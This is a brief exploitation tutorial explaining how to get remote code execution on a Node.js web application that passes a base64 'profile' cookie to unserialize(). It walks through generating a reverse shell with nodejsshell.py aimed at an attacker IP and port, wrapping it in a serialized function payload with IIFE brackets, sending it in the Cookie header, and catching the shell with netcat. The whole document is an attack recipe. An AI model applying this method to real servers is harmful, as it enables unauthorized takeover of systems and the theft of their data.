How to exploit Node.js deserialization bug for Remote Code Execution
The web application reads a cookie named profile from the HTTP request, base64-decodes the cookie value and passes it to unserialize(). Because the cookie is untrusted input, an attacker can craft a malicious cookie value to exploit this vulnerability.
Generate the reverse shell payload using nodejsshell.py:
python nodejsshell.py Attacker_IP Attacker_Port
[+] LHOST = Attacker_IP
[+] LPORT = Attacker_Port
Now generate the serialized payload and add IIFE brackets () after the function body.
{"rce":"_$$ND_FUNC$$_function (){
GENERATED_PAYLOAD_CODE
}()"}
Now Base64-encode the final payload above, then make a request to the web server with the encoded payload in the Cookie header.
Start listening for a reverse shell using:
nc -l Attacker_IP Attacker_Port